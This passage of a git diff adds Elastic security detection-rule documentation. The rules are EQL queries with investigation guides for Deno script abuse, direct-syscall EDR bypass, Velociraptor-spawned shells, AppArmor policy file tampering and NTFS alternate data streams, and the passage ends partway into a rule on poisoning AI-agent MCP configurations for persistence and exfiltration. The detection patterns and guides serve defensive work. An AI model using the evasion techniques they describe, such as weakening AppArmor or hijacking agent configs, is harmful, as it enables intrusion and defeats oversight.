Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Sub-technique: +** Name: Encrypted/Encoded File +** ID: T1027.013 +** Reference URL: https://attack.mitre.org/techniques/T1027/013/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc new file mode 100644 index 0000000000..ad5a9ed389 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno]] +=== Suspicious JavaScript Execution via Deno + +Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat +* https://deno.com/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious JavaScript Execution via Deno* + + +Deno is a legitimate JavaScript/TypeScript runtime. This rule fires when a Deno process (identified by name, PE original filename, or code signer "Deno Land Inc.") is started with a command line matching suspicious patterns: javascript with base64, eval(, http, or javascript import. Such patterns are commonly used to run inline or remote scripts and can indicate abuse. + + +*Possible investigation steps* + + +- Review process.command_line and process.args to see the exact script or URL being executed. +- Identify the parent process and how Deno was launched (user, script, terminal, or other tool). +- Check whether Deno is approved on the host; if not, treat as potential unauthorized software execution. +- Correlate with file creation or network events around the same time (downloads, script drops). + + +*False positive analysis* + + +- Legitimate development or automation that runs Deno with eval, http imports, or base64-encoded snippets may trigger; allowlist by host or command-line pattern where appropriate. + + +*Response and remediation* + + +- If abuse is confirmed: contain the host, terminate the Deno process, and remove or block Deno if not authorized; investigate how the script was delivered and scope for similar activity. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "deno.exe" or ?process.pe.original_file_name == "deno.exe" or ?process.code_signature.subject_name == "Deno Land Inc.") and + process.command_line : ("*javascript*base64*", "*eval(*", "*http*", "*javascript*import*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc new file mode 100644 index 0000000000..3cae1cf993 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc @@ -0,0 +1,162 @@ +[[prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call]] +=== Suspicious Process Access via Direct System Call + +Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.sysmon_operational-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/SBousseaden/status/1278013896440324096 +* https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Sysmon + +*Version*: 315 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Process Access via Direct System Call* + + +Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. + +More context and technical details can be found in this https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/[research blog]. + +This rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + + +*False positive analysis* + + +- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove the malicious certificate from the root certificate store. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.code == "10" and + length(winlog.event_data.CallTrace) > 0 and + + /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */ + not winlog.event_data.CallTrace : + ("?:\\WINDOWS\\SYSTEM32\\ntdll.dll*", + "?:\\WINDOWS\\SysWOW64\\ntdll.dll*", + "?:\\WINDOWS\\System32\\sysfer.dll*", + "?:\\Windows\\System32\\wow64cpu.dll*", + "?:\\WINDOWS\\System32\\wow64win.dll*", + "?:\\Windows\\System32\\win32u.dll*", + "?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\*\\sysfer.dll*") and + + not winlog.event_data.TargetImage : + ("?:\\Program Files (x86)\\Malwarebytes Anti-Exploit\\mbae-svc.exe", + "?:\\Program Files\\Cisco\\AMP\\*\\sfc.exe", + "?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\msedgewebview2.exe", + "?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\*\\AcroCEF.exe") and + + not (process.executable : ("?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe", + "?:\\Program Files (x86)\\World of Warcraft\\_classic_\\WowClassic.exe") and + not winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc new file mode 100644 index 0000000000..f40fa63dc8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc @@ -0,0 +1,129 @@ +[[prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor]] +=== Suspicious Shell Execution via Velociraptor + +Detects shell executions (cmd, PowerShell, rundll32) spawned by Velociraptor. Threat actors have been observed installing Velociraptor to execute shell commands on compromised systems, blending in with legitimate system processes. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399 +* https://attack.mitre.org/techniques/T1219/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Execution +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Shell Execution via Velociraptor* + + +Velociraptor is a legitimate endpoint visibility and response tool. Threat actors have been observed deploying it on compromised systems to run shell commands (cmd, PowerShell, rundll32), making their activity look like normal Velociraptor-collector behavior. + + +*Possible investigation steps* + + +- Confirm the parent process name matches a Velociraptor binary (e.g. velociraptor.exe, Velociraptor.exe) and the child is cmd.exe, powershell.exe, or rundll32.exe. +- Review the child process command line for suspicious or interactive commands (e.g. download, lateral movement, credential access) versus known Velociraptor artifact scripts (Get-LocalGroupMember, Get-Date, registry queries, Velociraptor Tools module). +- Identify how Velociraptor was installed (dropped by another process, scheduled task, service); correlate with earlier process or file events on the host. +- Check whether the Velociraptor executable path and code signature are expected (e.g. Program Files vs. temp or user writable); unauthorized installs are often from non-standard paths. +- Correlate with other alerts for the same host or user (initial access, persistence, C2) to determine if this is abuse vs. legitimate IR/DFIR use. + + +*False positive analysis* + + +- Legitimate Velociraptor artifacts that run Get-LocalGroupMember, Get-Date, registry Run key checks, or Velociraptor Tools PowerShell module are excluded by the rule; remaining FPs may be custom artifacts. Allowlist by command-line pattern or host if you use Velociraptor for authorized IR and see known-good artifacts. + + +*Response and remediation* + + +- If abuse is confirmed: isolate the host, terminate the Velociraptor and child shell processes, and remove the Velociraptor installation (binary, service, config). +- Determine how Velociraptor was deployed and close the initial access vector; rotate credentials for affected accounts. +- If the deployment was authorized (IR/DFIR), document and tune the rule or add an exception to reduce noise. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.command_line != null and + process.parent.name : "velociraptor.exe" and + process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and + not (process.name : "powershell.exe" and process.command_line : "*RwBlAHQALQBMAG8AYwBhAGwARwByAG8AdQBwAE0AZQBtAGIAZQBy*") and + not (process.name : "powershell.exe" and process.command_line : "*RwBlAHQALQBEAGEAdABl*" and process.command_line : "*-Format*") and + not (process.name : "cmd.exe" and process.command_line : "*start*127.0.0.1:8889*") and + not (process.name : "powershell.exe" and process.command_line : "*RwBlAHQALQBJAHQAZQBt*" and process.command_line : "*UgBlAGcAaQBzAHQAcgB5*" and process.command_line : "*UgB1AG4A*") and + not (process.name : "powershell.exe" and + process.args : ("RwBlAHQALQ*", "UgBlAG0AbwB2AGUALQBJAHQAZQBtACA*", "C:\\Program Files\\Velociraptor\\thor.db", + "import-module \"C:\\Program Files\\Velociraptor\\Tools\\*")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc new file mode 100644 index 0000000000..28e4a4038b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc @@ -0,0 +1,167 @@ +[[prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files]] +=== Suspicious Write Attempt to AppArmor Policy Management Files + +Detects processes attempting to write to AppArmor policy management pseudo-files located under "/sys/kernel/security/apparmor/". These special kernel interfaces are used to load, replace, or remove AppArmor profiles (".load", ".replace", ".remove"). In normal environments, AppArmor policy management is typically performed by administrative tools such as "apparmor_parser" during system initialization or package installation. Direct interaction with these pseudo-files from shell utilities, interpreters, or scripting environments is uncommon and may indicate attempts to modify security policy at runtime. Adversaries may abuse these interfaces to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser as part of local privilege escalation chains. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* endgame-* +* logs-crowdstrike.fdr* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt +* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Write Attempt to AppArmor Policy Management Files* + + +This rule flags shells, scripting runtimes, and basic file utilities trying to write directly to AppArmor’s policy control files, an unusual action that can change or remove enforcement while the system is running. An attacker with local code execution may echo a crafted profile into `.replace` or write to `.remove` from a shell script to weaken confinement before dumping credentials or launching a privilege-escalation chain. + + +*Possible investigation steps* + + +- Determine whether the activity aligns with authorized package installation, configuration management, or AppArmor maintenance by correlating the timestamp with change tickets, software updates, and administrator sessions. +- Reconstruct the full parent-child execution chain and user context to identify how the write was initiated, whether it came from an interactive shell, script, container entrypoint, or remotely spawned session, and whether elevated privileges were obtained just beforehand. +- Capture the exact payload or referenced file used in the write attempt and compare it to approved AppArmor profiles to determine whether the action was loading a new profile, weakening an existing one, or removing confinement entirely. +- Verify the system’s current AppArmor state immediately after the event, including enforcement mode, recently modified or unloaded profiles, and any audit or kernel messages indicating parser errors, profile replacement, or successful policy removal. +- Investigate adjacent activity from the same user, session, and host for signs of defense evasion or privilege escalation, such as sudo abuse, exploitation traces, disabling other security controls, credential access, or rapid execution of binaries that would normally be confined. + + +*False positive analysis* + + +- A legitimate system initialization or package maintenance script may use `echo`, `tee`, `cat`, or a shell redirection to load or replace an approved AppArmor profile, so verify the parent process and event timing align with boot activity or an authorized update and that the profile content matches a known file under `/etc/apparmor.d/`. +- An administrator or deployment script may temporarily reload or remove a profile during sanctioned application troubleshooting, so confirm the executing user or service account, the script location and change record, and that the expected AppArmor profile was restored or reloaded immediately afterward. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network and suspend interactive access while preserving the shell history, the script or payload used to write to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and any related dropped files for forensic review. +- Re-enable AppArmor enforcement from trusted administration tooling, compare currently loaded profiles with the approved baseline under `/etc/apparmor.d/`, and remove any unauthorized profile loads, replacements, or profile removals introduced by the attacker. +- Hunt for and delete persistence established around the same activity, including new or modified `systemd` services, cron jobs, startup scripts, SSH `authorized_keys` entries, `sudoers` changes, and binaries or scripts placed in writable directories. +- Escalate immediately to incident response if AppArmor protections were successfully weakened or removed, a privileged service profile was altered, root access is suspected, or similar write attempts appear on additional Linux systems. +- Restore the host to a known-good state from a trusted image or approved configuration backup when system integrity is uncertain, then rotate credentials used on the host and harden access so only authorized administrators and deployment tooling can modify AppArmor policies. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2") and +( + process.name in ( + "cat", "echo", "tee", "dd", "truncate", "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", + "busybox", "awk", "sed", "xargs", "find", "grep", "node", "timeout", "env" + ) or + process.name like (".*", "python*", "perl*", "ruby*", "lua*", "php*") +) and +process.command_line like ( + "*/sys/kernel/security/apparmor/.load*", + "*/sys/kernel/security/apparmor/.replace*", + "*/sys/kernel/security/apparmor/.remove*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc new file mode 100644 index 0000000000..d3e96716c2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream]] +=== Unusual File Creation - Alternate Data Stream + +Identifies suspicious creation of Alternate Data Streams on highly targeted files using a script or command interpreter. This is uncommon for legitimate files and sometimes done by adversaries to hide malware. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: Microsoft Defender for Endpoint +* Data Source: SentinelOne +* Data Source: Elastic Endgame + +*Version*: 322 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Unusual File Creation - Alternate Data Stream* + + +Alternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute. + +The regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream. + +Attackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this: + - `Get-Content C:\Path\To\file.exe -stream SampleAlternateDataStreamName` +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + + +*False positive analysis* + + +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of process executable and file conditions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + process.name : ("cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "node.exe", "python*.exe") and + file.extension in~ ( + "pdf", "dll", "exe", "dat", "com", "bat", "cmd", "sys", "vbs", "vbe", "ps1", "hta", "txt", "js", "jse", + "wsh", "wsf", "sct", "docx", "doc", "xlsx", "xls", "pptx", "ppt", "rtf", "gif", "jpg", "png", "bmp", "img", "iso" + ) and + file.path : "C:\\*:*" and + not file.name :("*:$DATA", "*PG$Secure", "*Zone.Identifier", "*com.apple.lastuseddate#PS", "*com.apple.provenance") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: NTFS File Attributes +** ID: T1564.004 +** Reference URL: https://attack.mitre.org/techniques/T1564/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc new file mode 100644 index 0000000000..194b500606 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file]] +=== Unusual Process Modifying GenAI Configuration File + +Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via 